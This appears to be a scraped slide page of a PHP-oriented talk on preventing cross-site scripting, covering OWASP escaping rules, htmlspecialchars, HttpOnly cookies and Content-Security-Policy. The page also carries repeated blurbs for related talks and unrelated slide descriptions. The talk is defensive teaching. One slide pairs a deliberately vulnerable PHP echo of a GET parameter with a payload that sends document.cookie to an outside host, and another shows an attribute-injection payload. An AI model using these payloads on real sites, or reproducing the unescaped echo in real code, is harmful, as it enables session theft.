This presentation is from Null/OWASP/G4H November Bangalore MeetUp 2014.
technology.inmobi.com/events/null-owasp-g4h-november-meetup
Talk Outline:-
A) Reflective-(Non-Persistent Cross-site Scripting)
- What is Reflective Cross-site scripting.
- Testing for Reflected Cross site scripting
How to Test
- Black Box testing
- Bypass XSS filters
- Gray Box testing
Tools
Defending Against Reflective Cross-site scripting.
Examples of Reflective Cross-Site Scripting Attacks.
B) Stored -(Persistent Cross-site Scripting)
What is Stored Cross-site scripting.
How to Test
- Black Box testing
- Gray Box testing
Tools
Defending Against Stored Cross-site scripting.
Examples of Stored Cross-Site Scripting Attacks.
Cross Site Scripting: Prevention and Detection(XSS)Aman Singh
Cross-Site Scripting (referred to as XSS) is a type of web application attack where malicious client-side script is injected into the application output and subsequently executed by the user’s browser.
This presentation is from Null/OWASP/G4H November Bangalore MeetUp 2014.
technology.inmobi.com/events/null-owasp-g4h-november-meetup
Talk Outline:-
A) Reflective-(Non-Persistent Cross-site Scripting)
- What is Reflective Cross-site scripting.
- Testing for Reflected Cross site scripting
How to Test
- Black Box testing
- Bypass XSS filters
- Gray Box testing
Tools
Defending Against Reflective Cross-site scripting.
Examples of Reflective Cross-Site Scripting Attacks.
B) Stored -(Persistent Cross-site Scripting)
What is Stored Cross-site scripting.
How to Test
- Black Box testing
- Gray Box testing
Tools
Defending Against Stored Cross-site scripting.
Examples of Stored Cross-Site Scripting Attacks.
Cross Site Scripting: Prevention and Detection(XSS)Aman Singh
Cross-Site Scripting (referred to as XSS) is a type of web application attack where malicious client-side script is injected into the application output and subsequently executed by the user’s browser.
DNS hijacking using cloud providers – No verification neededFrans Rosén
This is my talk from OWASP Appsec EU and also Security Fest 2017.
A few years ago, Frans and his team posted an article on Detectify Labs regarding domain hijacking using services like AWS, Heroku and GitHub. These issues still remains and are still affecting a lot of companies. Jonathan Claudius from Mozilla even calls “Subdomain takeover” “the new XSS”. Since then, many tools have popped up to spot these sorts of vulnerabilities. Frans will go through both the currently disclosed and the non-disclosed ways to take control over domains and will share the specific techniques involved.
This talk introduces Spring's REST stack - Spring MVC, Spring HATEOAS, Spring Data REST, Spring Security OAuth and Spring Social - while refining an API to move higher up the Richardson maturity model
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
As the name suggests Cross Site Request Forgery Attack deals with the forgery of the trusted website of an authorized user with unwanted action. . These attacks have been called the “sleeping giant” of web-based vulnerabilities, because many sites on the Internet fail to protect against them and because they have been largely ignored by the web development and security communities . Our project aims at attacking the victim user by including a link or script in a page that accesses a site to which the user is known or is supposed to have been authenticated. Deep analysis of CSRF attack and finding the possibilities to mitigate the CSRF attack is our main focus and our objective on this project.
This presentation covers the Cross site scripting attacks and defences in web applications, this talk was delivered as part of OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.
DNS hijacking using cloud providers – No verification neededFrans Rosén
This is my talk from OWASP Appsec EU and also Security Fest 2017.
A few years ago, Frans and his team posted an article on Detectify Labs regarding domain hijacking using services like AWS, Heroku and GitHub. These issues still remains and are still affecting a lot of companies. Jonathan Claudius from Mozilla even calls “Subdomain takeover” “the new XSS”. Since then, many tools have popped up to spot these sorts of vulnerabilities. Frans will go through both the currently disclosed and the non-disclosed ways to take control over domains and will share the specific techniques involved.
This talk introduces Spring's REST stack - Spring MVC, Spring HATEOAS, Spring Data REST, Spring Security OAuth and Spring Social - while refining an API to move higher up the Richardson maturity model
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
As the name suggests Cross Site Request Forgery Attack deals with the forgery of the trusted website of an authorized user with unwanted action. . These attacks have been called the “sleeping giant” of web-based vulnerabilities, because many sites on the Internet fail to protect against them and because they have been largely ignored by the web development and security communities . Our project aims at attacking the victim user by including a link or script in a page that accesses a site to which the user is known or is supposed to have been authenticated. Deep analysis of CSRF attack and finding the possibilities to mitigate the CSRF attack is our main focus and our objective on this project.
This presentation covers the Cross site scripting attacks and defences in web applications, this talk was delivered as part of OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
What is it?
How to prevent?
How to test my application web?
what say OWASP about it
All about SQL injection and Cross Site Scripting XSS
Tools to test our application web
Rules to prevent attacks from Hackers on our web
SQL injection is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for execution.
This is a method to attack web applications that have a data repository.The
attacker would send a specially crafted SQL statement that is designed to cause
some malicious action.SQL injection is an attack technique that exploits a security
vulnerability occurring in the database layer of an application and a service. This
is most often found within web pages with dynamic content.
This presentation explores on how to test Cross site scripting Injection Vulnerabilities, prevention, Best practice, small lab(introduction to web
goat) etc.
This document describes something about big data at vccorp. It's an overview about some features and architecture in our system. We also have some problems needed to be solved.
Seminar on various security issues faced by PHP developers and ways to avoid them.
The Examples used in the seminar can be downloaded from -> http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz
Web Application Security DOs and DON’Ts
While you do not know attacks, how can you know about defense?
http://web.folio3.com/services/web-application-development/
A WordPress Plugin is actually a single file or group of files which extends or enhances the functionality of a WordPress site. Hire Dedicated Wordpress Developers which are skilled and experienced. Look here: https://bit.ly/2OTapfv
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
http://www.powerofcommunity.net/pastcon_2008.html & http://xcon.xfocus.org/XCon2008/index.html
The Same Origin Policy is the most talked about security policy which relates to web applications, it is the constraint within browsers that ideally stops active content from different origins arbitrarily communicating with each other. This policy has given rise to the class of bugs known as Cross-Site Scripting (XSS) vulnerabilities, though a more accurate term is usually JavaScript injection, where the ability to force an application to echo crafted data gives an attacker the ability to execute JavaScript within the context of the vulnerable origin.
This talk takes the view that the biggest weakness with the Same Origin Policy is that it must be implemented by every component of the browser independently, and if any component implements it differently to other components then the security posture of the browser is altered. As such this talk will examine how the 'Same Origin Policy' is implemented in different circumstances, especially in active content, and where the Same Origin Policy is not really enforced at all.
Francesca Gottschalk - How can education support child empowerment.pptxEduSkills OECD
Francesca Gottschalk from the OECD’s Centre for Educational Research and Innovation presents at the Ask an Expert Webinar: How can education support child empowerment?
Palestine last event orientationfvgnh .pptxRaedMohamed3
An EFL lesson about the current events in Palestine. It is intended to be for intermediate students who wish to increase their listening skills through a short lesson in power point.
June 3, 2024 Anti-Semitism Letter Sent to MIT President Kornbluth and MIT Cor...Levi Shapiro
Letter from the Congress of the United States regarding Anti-Semitism sent June 3rd to MIT President Sally Kornbluth, MIT Corp Chair, Mark Gorenberg
Dear Dr. Kornbluth and Mr. Gorenberg,
The US House of Representatives is deeply concerned by ongoing and pervasive acts of antisemitic
harassment and intimidation at the Massachusetts Institute of Technology (MIT). Failing to act decisively to ensure a safe learning environment for all students would be a grave dereliction of your responsibilities as President of MIT and Chair of the MIT Corporation.
This Congress will not stand idly by and allow an environment hostile to Jewish students to persist. The House believes that your institution is in violation of Title VI of the Civil Rights Act, and the inability or
unwillingness to rectify this violation through action requires accountability.
Postsecondary education is a unique opportunity for students to learn and have their ideas and beliefs challenged. However, universities receiving hundreds of millions of federal funds annually have denied
students that opportunity and have been hijacked to become venues for the promotion of terrorism, antisemitic harassment and intimidation, unlawful encampments, and in some cases, assaults and riots.
The House of Representatives will not countenance the use of federal funds to indoctrinate students into hateful, antisemitic, anti-American supporters of terrorism. Investigations into campus antisemitism by the Committee on Education and the Workforce and the Committee on Ways and Means have been expanded into a Congress-wide probe across all relevant jurisdictions to address this national crisis. The undersigned Committees will conduct oversight into the use of federal funds at MIT and its learning environment under authorities granted to each Committee.
• The Committee on Education and the Workforce has been investigating your institution since December 7, 2023. The Committee has broad jurisdiction over postsecondary education, including its compliance with Title VI of the Civil Rights Act, campus safety concerns over disruptions to the learning environment, and the awarding of federal student aid under the Higher Education Act.
• The Committee on Oversight and Accountability is investigating the sources of funding and other support flowing to groups espousing pro-Hamas propaganda and engaged in antisemitic harassment and intimidation of students. The Committee on Oversight and Accountability is the principal oversight committee of the US House of Representatives and has broad authority to investigate “any matter” at “any time” under House Rule X.
• The Committee on Ways and Means has been investigating several universities since November 15, 2023, when the Committee held a hearing entitled From Ivory Towers to Dark Corners: Investigating the Nexus Between Antisemitism, Tax-Exempt Universities, and Terror Financing. The Committee followed the hearing with letters to those institutions on January 10, 202
How to Make a Field invisible in Odoo 17Celine George
It is possible to hide or invisible some fields in odoo. Commonly using “invisible” attribute in the field definition to invisible the fields. This slide will show how to make a field invisible in odoo 17.
Operation “Blue Star” is the only event in the history of Independent India where the state went into war with its own people. Even after about 40 years it is not clear if it was culmination of states anger over people of the region, a political game of power or start of dictatorial chapter in the democratic setup.
The people of Punjab felt alienated from main stream due to denial of their just demands during a long democratic struggle since independence. As it happen all over the word, it led to militant struggle with great loss of lives of military, police and civilian personnel. Killing of Indira Gandhi and massacre of innocent Sikhs in Delhi and other India cities was also associated with this movement.
Biological screening of herbal drugs: Introduction and Need for
Phyto-Pharmacological Screening, New Strategies for evaluating
Natural Products, In vitro evaluation techniques for Antioxidants, Antimicrobial and Anticancer drugs. In vivo evaluation techniques
for Anti-inflammatory, Antiulcer, Anticancer, Wound healing, Antidiabetic, Hepatoprotective, Cardio protective, Diuretics and
Antifertility, Toxicity studies as per OECD guidelines
Embracing GenAI - A Strategic ImperativePeter Windle
Artificial Intelligence (AI) technologies such as Generative AI, Image Generators and Large Language Models have had a dramatic impact on teaching, learning and assessment over the past 18 months. The most immediate threat AI posed was to Academic Integrity with Higher Education Institutes (HEIs) focusing their efforts on combating the use of GenAI in assessment. Guidelines were developed for staff and students, policies put in place too. Innovative educators have forged paths in the use of Generative AI for teaching, learning and assessments leading to pockets of transformation springing up across HEIs, often with little or no top-down guidance, support or direction.
This Gasta posits a strategic approach to integrating AI into HEIs to prepare staff, students and the curriculum for an evolving world and workplace. We will highlight the advantages of working with these technologies beyond the realm of teaching, learning and assessment by considering prompt engineering skills, industry impact, curriculum changes, and the need for staff upskilling. In contrast, not engaging strategically with Generative AI poses risks, including falling behind peers, missed opportunities and failing to ensure our graduates remain employable. The rapid evolution of AI technologies necessitates a proactive and strategic approach if we are to remain relevant.
Read| The latest issue of The Challenger is here! We are thrilled to announce that our school paper has qualified for the NATIONAL SCHOOLS PRESS CONFERENCE (NSPC) 2024. Thank you for your unwavering support and trust. Dive into the stories that made us stand out!
Acetabularia Information For Class 9 .docxvaibhavrinwa19
Acetabularia acetabulum is a single-celled green alga that in its vegetative state is morphologically differentiated into a basal rhizoid and an axially elongated stalk, which bears whorls of branching hairs. The single diploid nucleus resides in the rhizoid.
2. XSS
➢XSS enables attackers to inject client-side script
into Web pages viewed by other users.
➢A cross-site scripting vulnerability may be used
by attackers to bypass access controls such as
the same origin policy.
➢Cross-site scripting carried out on websites
accounted for roughly 84% of all security
vulnerabilities documented by Symantec as of
2007.
Source: http://en.wikipedia.org/wiki/Cross-site_scripting
3. Type of XSS
1. Non-Persistent (or Reflected) XSS attack, the attack
is in the request itself (frequently the URL) and the vulnerability occurs
when the server inserts the attack in the response verbatim or incorrectly
escaped or sanitized.
2. Persistent (or Stored) XSS attack, the attacker stores the
attack in the application (e.g., in a snippet) and the victim triggers the attack
by browsing to a page on the server that renders the attack, by not properly
escaping or sanitizing the stored data.
Source : https://google-gruyere.appspot.com/part2
5. XSS Example - 2
Session Hijacking
File: cookies_steal.php
<?php session_start(); ?>
<html>
<head></head>
<body><?php
echo isset($_GET['c'])?$_GET['c']:'';
?>
</body> </html>
Hit following urls in firefox:
http://localhost/OWASP/cookies_steal.php?c=<script>document.location='http://test31.loc/c.php?c='%2Bdocument.cookie
;</script>
OR
http://localhost/OWASP/cookies_steal.php?c=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63
●
6. OWASP XSS Prevention Cheat Sheet
4 major OWASP rules to prevent XSS attack
a) RULE #0 - Never Insert Untrusted Data Except in Allowed Locations
For example:
<script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
<!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
<div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
<NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name
<style>...NEVER PUT UNTRUSTED DATA HERE...</style> directly in CSS
7. OWASP XSS Prevention Cheat Sheet
4 major OWASP rules to prevent XSS attack
b) RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content
For example:
<body>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</body>
<div>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</div>
any other normal HTML elements
8. OWASP XSS Prevention Cheat Sheet
4 major OWASP rules to prevent XSS attack
c)RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes
For example:
<div attr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...>content</div>
inside UNquoted attribute
<div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'>content</div>
inside single quoted attribute
<div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">content</div>
inside double quoted attribute
9. OWASP XSS Prevention Cheat Sheet
4 major OWASP rules to prevent XSS attack
c)RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes
For example:
<div attr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...>content</div>
inside UNquoted attribute
<div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'>content</div>
inside single quoted attribute
<div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">content</div>
inside double quoted attribute
10. OWASP XSS Prevention Cheat Sheet
4 major OWASP rules to prevent XSS attack
d) RULE #3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values
For example:
<script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
inside a quoted string
<script>x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</script>
one side of a quoted expression
<div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"</div>
inside quoted event handler
Source: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
11. PHP Security
● Weak typing
It automatically convert data of an incorrect type into the expected type. Try to use functions and
operators that do not do implicit type conversions (e.g. === and not ==).
● Untrusted data
All data that is a product, or subproduct, of user input is to NOT be trusted. Super globals which are
not to be trusted are $_SERVER, $_GET, $_POST, $_REQUEST, $_FILES and $_COOKIE. Not all
data in $_SERVER can be faked by the user, but a considerable amount in it can, particularly and
specially everything that deals with HTTP headers (they start with HTTP_).
● File uploads
Use
$finfo = new finfo(FILEINFO_MIME_TYPE);
$fileContents = file_get_contents($_FILES['some_name']['tmp_name']);
$mimeType = $finfo->buffer($fileContents);
Instead of
if ($_FILES['some_name']['type'] == 'image/jpeg') {
//Proceed to accept the file as a valid image
}
● Use of $_REQUEST
Using $_REQUEST is strongly discouraged.
12. Solution for XSS for PHP
● Htmlspecialchars()
● strip_tags()
● filter_var()
● HTML Purifier
● Library php-antixss
● HttpOnly cookies
13. Htmlspecialchars()
Certain characters have special significance in HTML, and should be
represented by HTML entities if they are to preserve their meanings. This
function returns a string with these conversions made. f you require all input
substrings that have associated named entities to be translated, use
htmlentities() instead.
The translations performed are:
'&' (ampersand) becomes '&'
'"' (double quote) becomes '"' when ENT_NOQUOTES is not set.
"'" (single quote) becomes ''' (or ') only when ENT_QUOTES is
set.
'<' (less than) becomes '<'
'>' (greater than) becomes '>'
Source: http://in1.php.net/htmlspecialchars
14. Htmlspecialchars()
Function specification:
string htmlspecialchars ( string $string [, int $flags = ENT_COMPAT | ENT_HTML401 [, string $encoding = 'UTF-8' [, bool $double_encode
= true ]]] )
If you miss the second parameter, which is ENT_COMPAT, give you an alert :
Example code for PHP 5.3:
<?php header('Content-Type: text/html; charset=UTF-8'); ?>
<!DOCTYPE html>
<?php
//http://localhost/OWASP/test1.php?c=' onmouseover='alert(/Meow!/)
$input = $_GET['c']; $output = htmlspecialchars($input); ?>
<html> <head>
<title>Single Quoted Attribute</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head> <body>
<div>
<span title='<?php echo $output ?>'>
What's that latin placeholder text again?
</span>
</div>
</body>
</html
Source : http://blog.astrumfutura.com/2012/03/a-hitchhikers-guide-to-cross-site-scripting-xss-in-php-part-1-how-not-to-use-htmlspecialchars-for-output-escaping
15. HttpOnly cookies
According to a daily blog article by Jordan Wiens, “No cookie for you!,” HttpOnly cookies were first implemented in 2002 by
Microsoft Internet Explorer developers for Internet Explorer 6 SP1.
HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a
cookie helps mitigate the risk of client side script accessing the protected cookie (if the browser supports it).
PHP Session HttpOnly
You can add entry in php.ini
ini_set( 'session.cookie_httponly', 1 );
Or in your code:
bool setcookie ( string $name [, string $value [, int $expire = 0 [, string $path [, string $domain [, bool $secure = false [, bool
$httponly = false ]]]]]] )
Example:
<?php
session_set_cookie_params ( 600, "/", "localhost" , false ,true);
session_start();
?>
<html><body>
<script>
alert(document.cookie);
</script>
</body> </html>
Source: https://www.owasp.org/index.php/HttpOnly
●
16. HTML Purifier
HTML Purifier is a standards-compliant HTML filter library written in PHP.
HTML Purifier will not only remove all malicious code (better known as XSS)
with a thoroughly audited, secure yet permissive whitelist, it will also make
sure your documents are standards compliant, something only achievable
with a comprehensive knowledge of W3C's specifications.
PHP Yii framework also provide this in form of CHtmlPurifier
Source : http://htmlpurifier.org/
http://www.yiiframework.com/doc/api/1.1/CHtmlPurifier
17. Content-Security Policy
The Content-Security Policy (CSP) is a HTTP header which communicates a whitelist of trusted resource
sources that the browser can trust. Any source not included in the whitelist can now be ignored by the
browser since it’s untrusted.
For example:
X-Content-Security-Policy: script-src 'self'
This CSP header tells the browser to only trust Javascript source URLs pointing to the current domain.
X-Content-Security-Policy: script-src 'self' http://code.jquery.com
If we need to use Javascript from another source besides ‘self’, we can extend the whitelist to include it.
For example, let’s include jQuery’s CDN address.
Here’s a list of the resource directives supported:
connect-src: Limits the sources to which you can connect using XMLHttpRequest, WebSockets, etc.
font-src: Limits the sources for web fonts.
frame-src: Limits the source URLs that can be embedded on a page as frames.
img-src: Limits the sources for images.
media-src: Limits the sources for video and audio.
object-src: Limits the sources for Flash and other plugins.
script-src: Limits the sources for script files.
style-src: Limits the sources for CSS files.
Source: http://phpsecurity.readthedocs.org/en/latest/Cross-Site-Scripting-(XSS).html
18. Summary Defending Against XSS Attacks
● Input Validation
● Escaping (also Encoding)
● Never Inject Data Except In Allowed Locations
● Always HTML Escape Before Injecting Data Into The HTML Body Context
● Always HTML Attribute Escape Before Injecting Data Into The HTML Attribute
Context
● Always Javascript Escape Before Injecting Data Into Javascript Data Values
● Content-Security Policy
● HTML Sanitisation
Source: http://phpsecurity.readthedocs.org/en/latest/Cross-Site-Scripting-(XSS).html